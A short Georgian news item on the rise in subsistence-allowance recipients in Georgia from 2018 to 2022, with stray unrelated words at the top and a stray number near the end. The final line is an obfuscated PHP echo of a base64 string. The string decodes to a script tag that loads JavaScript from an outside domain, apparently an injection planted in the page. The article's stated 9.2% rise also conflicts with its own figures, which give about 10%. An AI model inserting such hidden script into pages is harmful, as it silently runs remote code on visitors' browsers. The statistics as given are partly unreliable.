celsiusi
ავერსი შნაიდერი

სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2022 წელს საქართველოში საარსებო შემწეობის მიმღებთა ოდენობა 647 738-მდე გაიზარდა. შედეგად, საარსებო შემწეობას მოსახლეობის 17.4 პროცენტი იღებს.

აღნიშნული მაჩვენებელი, 2021 წელთან შედარებით, 9.2 პროცენტით არის გაზრდილი. ანუ, 2022 წელს, 2021 წელთან შედარებით, 60 214-ით მეტი ადამიანი იღებს საარსებო შემწეობას.

საარსებო შემწეობის მიმღები მოსახლეობის ბოლო ხუთი წლის სტატისტიკა კი ასე გამოიყურება: 2018 წელი – 438 583 ადამიანი, 2019 წელი – 441 448 ადამიანი, 2020 წელი – 483 702 ადამიანი, 2021 წელი – 587 524 ადამიანი, 2022 წელი – 647 738 ადამიანი. 

341
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");